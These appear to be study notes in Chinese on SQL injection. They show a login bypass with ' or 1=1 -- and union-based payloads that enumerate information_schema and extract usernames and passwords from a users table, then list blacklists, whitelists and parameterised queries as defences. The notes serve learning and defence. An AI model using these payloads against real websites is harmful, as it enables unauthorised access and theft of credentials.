SQL 基本語法
1
2
| SELECT 欄位 FROM 表格
SELECT 欄位 FROM 表格 UNION 1,2,3,...
|
Authrization Bypass
PHP
1
2
| $user = $_GET[key=value]
$sql = "SELECT * FROM db WHERE USER = ' ' or 1=1 --"(True)
|
在登陸介面 name 輸入 ' or 1=1 -- , password隨便輸
1
2
| ?catogority=.... 這是向DB 輸 SQL指令
?catogority=' or 1=1 -- 使得DB輸出所為true東西
|
Union SQL injection
確認有幾個欄位
1
2
3
| UNION SELECT NULL --
UNION SELECT NULL NULL --
UNION SELECT NULL NULL NULL --
|
確定是不是字串
1
2
3
| UNION SELECT 'a' NULL NULL
UNION SELECT NULL 'a' NULL
UNION SELECT NULL NULL 'a'
|
查看有什麼資料
1
2
3
| information_schema.schemata
information_schema.tables
information_schema.columns
|
EX: 取得某網站管理員帳號
1
2
3
4
5
| 'UNION SELECT 'a', 'a' --
'UNION SELECT schema_name, schema_name FROM information_schema.schemata --
'UNION SELECT table_name, table_name FROM information_schema.tables WHERE table_schema = 'public' --
'UNION SELECT column_name, column_name FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'users' --
'UNION SELECT username, password FROM public.users --
|
預防
- 黑名單
拒絕含有SQL關鍵字輸入 (駭客總有方法進入, ex: 正則化…)
- 白名單
只允許特定字加入SQL
- 參數化查詢
最有效防止
先編譯完再將查詢參數填入(參數不會被當作執行語法)
